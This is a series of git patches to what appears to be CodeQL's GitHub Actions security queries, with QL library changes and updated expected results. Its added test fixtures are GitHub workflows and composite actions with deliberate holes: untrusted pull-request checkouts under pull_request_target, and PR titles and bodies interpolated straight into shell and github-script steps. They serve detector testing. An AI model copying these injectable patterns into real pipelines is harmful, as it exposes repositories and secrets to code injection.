pull_request_target: jobs: check-execution-context: diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 4fbfca241261..13637396f90e 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -255,7 +255,6 @@ edges | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | @@ -273,7 +272,6 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 181bd5673bc4..81a8c63c8822 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -1,7 +1,3 @@ -| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index eb9fcc2418ab..29237c9a544e 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -4,9 +4,15 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From abd49d5b110a37fcf311586179b0553790eee87f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 12:12:29 +0200 Subject: [PATCH 526/707] Improve privilege workflow detection --- ql/lib/codeql/actions/Helper.qll | 16 ---------------- 1 file changed, 16 deletions(-) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index f6c31a6e8eab..9ac67575b8b3 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -252,26 +252,10 @@ predicate inPrivilegedExternallyTriggerableJob(AstNode node) { ) } -predicate calledByPrivilegedExternallyTriggerableJob(AstNode node) { - exists(ReusableWorkflow rw, ExternalJob caller, Job callee | - callee = node.getEnclosingJob() and - rw.getACaller() = caller and - rw.getAJob() = callee and - caller.isPrivilegedExternallyTriggerable() - ) - or - exists(LocalJob caller | - caller = node.getEnclosingCompositeAction().getACallerJob() and - caller.isPrivilegedExternallyTriggerable() - ) -} - predicate inPrivilegedContext(AstNode node) { inPrivilegedCompositeAction(node) or inPrivilegedExternallyTriggerableJob(node) - or - calledByPrivilegedExternallyTriggerableJob(node) } predicate inNonPrivilegedCompositeAction(AstNode node) { From 090d22fa7a870430a226ac8faddd210d6f59cab1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:38:42 +0200 Subject: [PATCH 527/707] Add GetRepoRoot helper function --- ql/lib/codeql/actions/Helper.qll | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 9ac67575b8b3..0df7b1250199 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -298,3 +298,20 @@ string defaultBranchNames() { not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and result = ["main", "master"] } + +string getRepoRoot() { + exists(Workflow w | + w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and + result = + w.getLocation() + .getFile() + .getRelativePath() + .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and + // exclude workflow_enum reusable workflows directory root + not result.indexOf(".github/reusable_workflows/") > -1 + or + not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and + not w.getLocation().getFile().getRelativePath().indexOf(".github/reusable_workflows") > -1 and + result = "" + ) +} From ffbddb10732d33cc934efc1d8dd570664a61e0d2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:40:15 +0200 Subject: [PATCH 528/707] Simplify Callable/call match --- ql/lib/codeql/actions/ast/internal/Ast.qll | 55 +++++++++++----------- 1 file changed, 28 insertions(+), 27 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d05174f47878..d1c7718d77b4 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -308,19 +308,22 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { LocalJobImpl getACallerJob() { result = this.getACallerStep().getEnclosingJob() } UsesStepImpl getACallerStep() { - exists(UsesStepImpl caller, string gwf_path, string path | - // the workflow files may not be rooted in the parent directory of .github/workflows - // extract the offset so we can remove it from the action path - gwf_path = - caller - .getLocation() + exists(DataFlow::CallNode call | + call.getCalleeNode() = this and + result = call.getCfgNode().getAstNode() + ) + } + + string getResolvedPath() { + result = + ["", "./"] + + this.getLocation() .getFile() .getRelativePath() - .prefix(caller.getLocation().getFile().getRelativePath().indexOf(".github/workflows/")) and - path = this.getLocation().getFile().getRelativePath().replaceAll(gwf_path, "") and - caller.getCallee() = ["", "./"] + path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and - result = caller - ) + .replaceAll(getRepoRoot(), "") + .replaceAll("/action.yml", "") + .replaceAll("/action.yaml", "") + .replaceAll(".github/reusable_workflows/", "") } private predicate hasExplicitSecretAccess() { @@ -352,6 +355,8 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { ) } + EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } + /** Holds if the action is privileged and externally triggerable. */ predicate isPrivilegedExternallyTriggerable() { // the action is externally triggerable @@ -447,6 +452,16 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { result = call.getCfgNode().getAstNode() ) } + + string getResolvedPath() { + result = + ["", "./"] + + this.getLocation() + .getFile() + .getRelativePath() + .replaceAll(getRepoRoot(), "") + .replaceAll(".github/reusable_workflows/", "") + } } class InputsImpl extends AstNodeImpl, TInputsNode { @@ -1229,15 +1244,6 @@ abstract class UsesImpl extends AstNodeImpl { } } -/** - * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. - * The capture groups are: - * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` - * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. - * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. - */ -private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } - /** A Uses step represents a call to an action that is defined in a GitHub repository. */ class UsesStepImpl extends StepImpl, UsesImpl { YamlScalar u; @@ -1249,19 +1255,14 @@ class UsesStepImpl extends StepImpl, UsesImpl { /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ override string getCallee() { if u.getValue().indexOf("@") > 0 - then - result = - ( - u.getValue().regexpCapture(usesParser(), 1) + "/" + - u.getValue().regexpCapture(usesParser(), 2) - ).toLowerCase() + then result = u.getValue().prefix(u.getValue().indexOf("@")) else result = u.getValue() } override ScalarValueImpl getCalleeNode() { result.getNode() = u } /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } + override string getVersion() { result = u.getValue().suffix(u.getValue().indexOf("@") + 1) } override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" From ef549ef79564ece1975a6f8df03208175f93b2e6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:41:03 +0200 Subject: [PATCH 529/707] Add Outputs nodes as CFG/DFG nodes --- ql/lib/codeql/actions/controlflow/internal/Cfg.qll | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 1fe4a3e7e1c9..8a6e52309fb2 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -148,7 +148,7 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos rank[i](AstNode child, Location l | ( child = this.(CompositeAction).getAnInput() or - child = this.(CompositeAction).getAnOutputExpr() or + child = this.(CompositeAction).getOutputs() or child = this.(CompositeAction).getRuns() ) and l = child.getLocation() @@ -172,7 +172,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { rank[i](AstNode child, Location l | ( child = this.(ReusableWorkflow).getAnInput() or - child = this.(ReusableWorkflow).getAnOutputExpr() or + child = this.(ReusableWorkflow).getOutputs() or child = this.(ReusableWorkflow).getStrategy() or child = this.(ReusableWorkflow).getAJob() ) and @@ -202,7 +202,7 @@ private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getOutputExpr(_) and l = child.getLocation() + child = super.getAnOutputExpr() and l = child.getLocation() | child order by From 7c2386bbeea2322424ac0064c2fd0eee7b92bcfe Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:42:52 +0200 Subject: [PATCH 530/707] Simplify callable/call matches --- .../dataflow/internal/DataFlowPrivate.qll | 45 ++----------------- 1 file changed, 4 insertions(+), 41 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 529bbc82087d..3226e41ba2ff 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -70,7 +70,7 @@ class DataFlowExpr extends Cfg::Node { } /** - * A call corresponds to a Uses steps where a local action, 3rd party action or a reusable workflow get called + * A call corresponds to a Uses steps where a composite action or a reusable workflow get called */ class DataFlowCall instanceof Cfg::Node { DataFlowCall() { super.getAstNode() instanceof Uses } @@ -89,23 +89,6 @@ class DataFlowCall instanceof Cfg::Node { Location getLocation() { result = this.(Cfg::Node).getLocation() } } -string getRepoRoot() { - exists(Workflow w | - w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and - result = - w.getLocation() - .getFile() - .getRelativePath() - .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and - // exclude workflow_enum reusable workflows directory root - not result.indexOf(".github/reusable_workflows/") > -1 - or - not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and - not w.getLocation().getFile().getRelativePath().indexOf(".github/reusable_workflows") > -1 and - result = "" - ) -} - /** * A Cfg scope that can be called */ @@ -113,22 +96,8 @@ class DataFlowCallable instanceof Cfg::CfgScope { string toString() { result = super.toString() } string getName() { - if this instanceof ReusableWorkflow - then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() // or - else - if this instanceof CompositeAction - then - result = - this.(CompositeAction) - .getLocation() - .getFile() - .getRelativePath() - .prefix(this.(CompositeAction) - .getLocation() - .getFile() - .getRelativePath() - .indexOf(["/action.yml", "/action.yaml"])) - else none() + result = this.(ReusableWorkflowImpl).getResolvedPath() or + result = this.(CompositeActionImpl).getResolvedPath() } /** Gets a best-effort total ordering. */ @@ -150,13 +119,7 @@ class NormalReturn extends ReturnKind, TNormalReturn { } /** Gets a viable implementation of the target of the given `Call`. */ -DataFlowCallable viableCallable(DataFlowCall c) { - c.getName() = result.getName() or - c.getName() = result.getName().replaceAll(getRepoRoot(), "") or - // special case for reusable workflows downloaded by the workflow_enum action - c.getName() = - result.getName().replaceAll(getRepoRoot(), "").replaceAll(".github/reusable_workflows/", "") -} +DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } /** * Gets a node that can read the value returned from `call` with return kind From 4fc9e3f0f1df5e091d47c200ae1b653d57a177f5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:43:10 +0200 Subject: [PATCH 531/707] Add Composite action's outputs as a return node --- ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index fbaf44c282f4..9c05256e2fa0 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -96,7 +96,10 @@ class ReturnNode extends ExprNode { ReturnNode() { this.asExpr() = outputs and - outputs = any(ReusableWorkflow s).getOutputs() + ( + exists(ReusableWorkflow w | w.getOutputs() = outputs) or + exists(CompositeAction a | a.getOutputs() = outputs) + ) } ReturnKind getKind() { result = TNormalReturn() } From e8a667fdc6f167209df36cc7d03114c23c58d03e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:43:31 +0200 Subject: [PATCH 532/707] Add new tests --- .../.github/actions/action5/action.yml | 8 ++ .../.github/actions/clone-repo/action.yaml | 46 +++++++++ .../.github/workflows/reusable-workflow.yml | 95 +++++++++++++++++++ .../workflows/composite-action-caller-3.yml | 1 + .../workflows/composite-action-caller-4.yml | 18 ++++ .../workflows/reusable-workflow-caller-3.yml | 10 ++ 6 files changed, 178 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml index 13c246f4ff37..a03c27be226b 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml @@ -9,6 +9,9 @@ outputs: result: description: "result" value: ${{ steps.step.outputs.result }} + result2: + description: "result" + value: ${{ steps.step2.outputs.result2 }} runs: using: 'composite' steps: @@ -20,6 +23,11 @@ runs: FOO: ${{ inputs.taint }} shell: bash run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT + - id: step2 + env: + FOO2: ${{ github.event.pull_request.body }} + shell: bash + run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT - name: Sink id: sink shell: bash diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml new file mode 100644 index 000000000000..75d7e79c1e45 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml @@ -0,0 +1,46 @@ +name: Clone repository +description: Clone repository +inputs: + title: + description: Title + required: true + forked-pr: + description: Whether the event is operating from a forked PR + required: true + fetch-depth: + description: Fetch depth for actions/checkout + default: "1" +outputs: + result: + description: "result" + value: ${{ steps.out.outputs.replaced }} + +runs: + using: composite + steps: + - shell: bash + run: echo "${{ inputs.title }}" + - uses: frabert/replace-string-action@v2.5 + id: out + with: + pattern: "\"" + string: ${{ inputs.title }} + replace-with: 'foo' + flags: g + - id: out2 + env: + FOO: ${{ inputs.title }} + shell: bash + run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT + - name: Clone branch + if: "!fromJSON(inputs.forked-pr)" + uses: actions/checkout@v3 + with: + fetch-depth: ${{ inputs.fetch-depth }} + - name: Clone forked PR + if: fromJSON(inputs.forked-pr) + uses: actions/checkout@v3 + with: + ref: refs/pull/${{ github.event.number }}/merge + fetch-depth: ${{ inputs.fetch-depth }} + diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml new file mode 100644 index 000000000000..0c4aa93c7a58 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml @@ -0,0 +1,95 @@ +name: changelog + +on: + workflow_call: + inputs: + taint: + description: taint + type: string + required: true + default: "" + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - run: echo "${{ inputs.taint }}" + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml index 231cddd0b882..62ad9ba779ce 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml @@ -11,4 +11,5 @@ jobs: with: taint: ${{ github.event.comment.body }} - run: echo "${{ steps.foo.outputs.result }}" + - run: echo "${{ steps.foo.outputs.result2 }}" diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml new file mode 100644 index 000000000000..e65660127326 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml @@ -0,0 +1,18 @@ + +name: Issue Workflow +on: + pull_request_target: +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - name: Clone branch + id: clone + uses: TestOrg/TestRepo/.github/actions/clone-repo@main + with: + title: ${{ github.event.pull_request.title }} + forked-pr: true + fetch-depth: 2 + - run: echo "${{ steps.clone.outputs.result }}" + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml new file mode 100644 index 000000000000..39dfafcf023e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml @@ -0,0 +1,10 @@ +name: Caller + +on: + pull_request_target: + +jobs: + test: + uses: TestOrg/TestRepo/.github/workflows/reusable-workflow.yml@main + with: + taint: ${{ github.event.pull_request.title }} From f095622a9bfde15828e876e23194a774c0b93686 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:50:59 +0200 Subject: [PATCH 533/707] Update expected test results --- .../CWE-020/ReusableWorkflowsSinks.expected | 16 +++++ .../CWE-094/CodeInjectionCritical.expected | 66 +++++++++++++++++-- .../CWE-094/CodeInjectionMedium.expected | 56 +++++++++++++++- .../CWE-829/UnpinnedActionsTag.expected | 4 +- 4 files changed, 132 insertions(+), 10 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected index f2178960774e..18e9f0186dfd 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected @@ -1,7 +1,23 @@ edges +| .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | | nodes +| .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | semmle.label | Job: call2 [workflow-output1] | +| .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | semmle.label | needs.call2.outputs.workflow-output1 | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | semmle.label | output Job outputs node [workflow-output1] | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | semmle.label | steps.step1.outputs.step-output | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label 